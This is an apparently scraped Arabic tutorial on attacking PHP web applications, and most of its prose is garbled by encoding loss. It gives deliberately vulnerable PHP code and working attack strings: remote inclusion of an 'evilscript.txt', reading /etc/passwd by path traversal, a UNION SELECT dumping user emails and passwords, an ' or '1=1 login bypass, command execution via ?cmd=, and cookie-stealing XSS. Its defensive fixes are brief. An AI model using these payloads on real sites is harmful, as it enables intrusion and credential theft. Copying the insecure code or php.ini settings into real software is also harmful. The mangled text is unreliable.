Professional Documents
Culture Documents
(Adel SBM) : TK - Code - The - WWW
(Adel SBM) : TK - Code - The - WWW
tk
2012
(Adel SBM)
www.the-code.tk
http://www.the-code.tk
$' * ')( +,
:
Bek4ever-ahmed.bak-THe Don :
:*+ ,-
Indoushka Over-X - Ayme NDz
:*:;http://www.noor7.com/
http://www.4algeria.com/vb
http://www.sa-hacker.com/vb/
http://www.gaza-hacker.com/cc
NJ.
2011/10/23
http://www.the-code.tk
:FP
>1DG1 (
F;R3 2 T( 1
:(D$7, #/1 D )Remote File Inclusion V (2
2 1 -- 1-2
DG1 1 -- 2-2
-$H> $P$ -- 3-2
:(2/R1 #/1 6$)R&/H/# )Local File Disclosure/Download V (3
2 1 -- 1-3
DG1 1 -- 2-3
-$H> $P$ -- 3-3
:(3$l D5H (G') SQL Injection V (4
2 1 -- 1-4
DG1 1 -- 2-4
(5pD 6$.+& .& ) SQL Injection Login Bypass-- 3-4
-$H> $P$ -- 4-4
:(1T 8$Pv&) Remote Command Execution V (5
2 1 -- 1-5
DG1 1 -- 2-5
-$H> $P$ -- 3-5
:(JAVA SCRIPT HTML 5( G') Cross-Site Scripting V (6
2 1 -- 1-6
-$H> $P$ -- 2-6
(3$l D5H )> F) P/) H 6$)R&) Download Backups+ INC files V (7
>/1+ -- 1-7
-$H> $P$ -- 2-7
:(>)R -H51 (1) 5' >/1( 8
>)&p (
http://www.the-code.tk
:>1DG1
$ > ( -)+3 1 PHP >.1l 53 ) >/)R (1 vv?)& 2p )H5-
).
' 2B ?P3 ($8 ). ') 3 6?B I )F1 F53 F.1,B.
FB 5 7 1 ,...D$G7
2B? (1 $) 3&51 P -H?F ; D v ?$ 1( )AB ($ 28). ?R # )15/7 p> )$B /7 , lB PHP ?P5 ,
.5/ >G.
(1 DB & D.v+ & /)D+ (1' #?& 2? D & 6+.
2B 2v3T8 ? % >$P$ ..F
5?$ >/1%, 15D1 >$ . 1 53 >1DG1 >/1
http://www.the-code.tk
F;R3 2 T( 1
7 1 M$l& MySQL PHP D 13, M$l& 5 IT 5A 8 2B v1 5/)
.3JF; I/ LOCALHOST (2/R) A )2/R) B+,
D7 7, ;. M$l D7, )6$l I/ APPSERVE WAMP 13, M$l& v?)
I R& / T php.ini (5? #/1 6D7, 2/R) A I/ >$+l
.$R 6?, FG$l
: 2/ ) 5?& $R, FD php.ini #/1 2B >$ 15/7) ( R,
safe_mode = off
register_globals = on
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
short_tag_open = on
display_errors = on
disabled_functions = N/A
1, #/A1 6lH (1 F1DA 3$, DH 3 : >$& 5A l& . 6D7 D7,
. ,?+, 7 1 PHP
.P)> 5, lp, H -5 D1 > 2B D,> P/A1 ,? MlV $3V
http://www.the-code.tk/code.php?id=96 :v D.& APPSERVE WAMP 13, 6$)R& ,
!!! 5' $ 3... ,?+ 8 > 2vv?) #$ : 6N+& M3 .F..D$ I /v3 $ /G& 5H
http://www.the-code.tk
<?php
$pagina=$_GET['pagina'];
include $pagina;
?>
5? )N PHP > 2B $) $pagina $) 2D+& include >D. p, 5? v
(PHP $ 7, I -;& 2p $/) $ D J1, H5l+1
http://127.0.0.1/test.php M33 P), RP& #/) -B, v)H : >RP 2B p D 5;' v
:(WAMP p 6)7 3 )%A 8 61
http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt?
-4 F)( 1 TXT 23 #/1 >$, 5? . D & 8 6 I+v&
. ,> F3 2B FP> 1
,> F3 2B 00 FP> 1 -4 . )5/N+ $?
http://www.the-code.tk
<?php
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
: (FP> 1 -4 D,) 6 v$D -http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt
http://the-code.tk/evilscript.txt.php v 6)$ D T .v (
B4 51 6.& 2? , D7, FP> 1 00 #$3 5 8
.6 F$ ,> $/) .v 2, ID+) $) D7, 5?& 2
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
>)$H /$ 15) ;F)" main_content" $)> 5, 6 2D+3 vv?)
REQUEST / > 6P, $)/ DR
http://127.0.0.1/index.php?main_content=http://the-code.tk/evilscript.txt?
http://www.the-code.tk
<?php
$pagina=$_GET['pagina'];
readfile($pagina);
?>
$pagina $), DR) #/) 5R1 H readfile >D R . p, 5? v
R$ R> 7$l, A) &H )#/) +1 DDR, 5Gv 2B 2,
Dv) >l+v, config.php #/1 61 p 15/71 5R& 2)> F) P/) H
: vBulletin
:6? 8F, 5?$
http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
..A( 1 D $ G/ #/) / $ 2,
. M,?+ 35?1 +' $ &H )#/) +1 2 ../../../../../etc/passwd
http://www.the-code.tk
http://www.the-code.tk
<?php
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
D3 2 SQL 1( GR3 )?( v3 2v7 8 /P1 $ $id $) B '3 )
/P1 $, DH 81 6N+& DH
1H $> P/A1 51 SQL 1 5? )?( vGR3 8 5? 2 /P( 1 /P1 $.3$l DG ;5& 1 6)& D, 51 8 GB
: p, 5; ( #?> $P$ 1 8 ' D ' J1 2B 6)& >)$H $id $) 5 $/1 6> 5F+ > 2B 1T
:6? 8F, 5? )?( 8 %A F+& 2 3$l DH 2B /p l+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'ORDER BY `date` DESC' at line 1
.p $ D F %A >
:2/ ) 5?> $P$ I 573http://127.0.0.1/test.php?id=1+union+all+select+1,2,version(),4-.(3 H 5)7 2B >, )3$l DH D I/ 6Rv v
http://www.the-code.tk
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals
where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
. /P1 $ Fl/v 2)> $G itemnr /> 5, $id $))> $H D,DR& $ 3' 3
: 2&T> 5F 6?, SQL ( G' (1 (?)v 2,
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,
3,concat(0x3a,email,password),5,6,7,8,9,10+from+users-.($1DA+) D.( 1 )> )/ 23 ?Dl I/ 6Rv
6)) 6$P, F' 2vv?) 8 DG( 1 2 SQL Injection :>1> '1
/P 2A& (1 6$P& 6 6)$ 8 5' 1 , D% *
.6 -B I 5 15/7) A I
:(5pD 6$.+& .& ) SQL Injection Login Bypass --3-4
SQL V (1 J. FPv 8 F+l 6); #p( 1 l7& 8
' or ' 1=1 J1) 7+1 '> 5 I 5pD( 1 v?)& 2 Injection
: )I/ J
login.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND
password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");
http://www.the-code.tk
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND
password = ' jocker'")
8 1T( &;)> 1 (?)& 2? 3$l D5H -1 617> G ( ?B D 5?& . .DF 5? . 5pD /7 -1 5pD( 1 v?)& SQL , vDp
: -$H> $P$ 4-4
: )8 1 DA, 1H GB F/7; $) 2B R/ )+& $id=(int)$_GET['id'];
: 3$l DG /p DR& 2> A R -v), H -,.()'"_+/*
exec
passthru
shell_exec
system
>.$3 D1 v?) 3B EXEC() >D, 1T $l& l : >'1 -.-l& F3( 1T 8$Pv& (? )1T
http://www.the-code.tk
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
$cmd >R 8 2B 5 $)/ >)$H / vv?) #$ vB >G,+ > p (1
: 2&T 67.3 vv?) v1
http://127.0.0.1/test.php?cmd=id
.>.$v F& 5( B+ I/ v&$' 1 )id 1T 8$Pv& $
7 )dir 1T Dv5 3 1( 1 1T 5?$ 2/R) B+ I/ . '> 2B
.(2R D/.) P/1
: 5 ( DG1 1 -- 2-5
dig.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -
$ns = $_GET['ns'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");
echo '<pre>';
system ("$ns");
http://www.the-code.tk
$dz = $_GET['ns'];
$alg = $_GET['alg]; .
........................ etc ........................
system ("dig @$dz $alg");
?>
5?$ #$ 2B
:6? 8F, 5?$ :>,;
l 2B D.& )?( D; v1 2FB 8F F35v 8 5.1l) 6. 1 $
.>$> G, F I/ ;F) DH 2B ()?& F$7B (? >$)7 -H5)
: 2&T 67.3 vv?) v1
: 5 ( 2 1 -- 1-6
test.php #/1 (1 (1 #G1 -: )5?( 1 #G1 -
<?php
$name=$_GET['name'];
print $name;
?>
print >D> 5, l V (1 $name $)/ >)$H / 3B 5? v);& 5
:6? 8F, M,? B; 5( GR3 5 1 ....... 5? 8> G 2B D$; ?Pv -
http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script>
8 2B v, A J$5? 5 DA+) J$5 5R& B; > 8B3 5F 5? >.$v
.>R
http://www.the-code.tk
p $P& V J$5? A 5 5R ,( 5?& >$/) l & p D' I 6 , >A J$5? 15/71 B ,/ >$R P& Dv . >$R I
.>H+) J$5? 15/71 +1 >$R +' I 5pD, 5G $pT 8; F)
htmlspecialchars()
htmlentities() >) 7 vv?) $' D; >/F -$H> G
. v HTML 5 53 >/17), 5G& D 8
:6? 8F, 5?$ -H) 5? 2,
php?>
;(['name=htmlentities($_GET['name$
;print $name
<?
-H5) 3$, DG >$$' +v 6$)R, )+& : Download Backups V
.DF+)
:$+, 1
http://127.0.0.1/adminpanel/phpmydump.php
( ))?( 1 > B5?1 5?& 2 inc P/1 7, G, )+& : INC files V
.DF+) -H5) 15/71 5R&
:(3$l DG, &15/71 5R #/1 H) $+, 1
http://127.0.0.1/inc/mysql.inc
: -$H> G 2-7
http://www.the-code.tk
http://www.the-code.tk
:>)&p
8 6> ?( $P$ 5A $' (1 #/A& ( 1 53 D D;5& 3 7)( 1
3 D( )1 I ,H M 'DG 2p, N; F) DH I/ D)7
I/ p 2v1 238 ...( '1 >1DG1 >/'1 I M/) / DF;) /
...6; J * ?)B 5+1 I/ 2N1 5Rv 5+)
http://www.the-code.tk
D5 2 D 5;
2011/10/23
http://www.the-code.tk
Z^] \[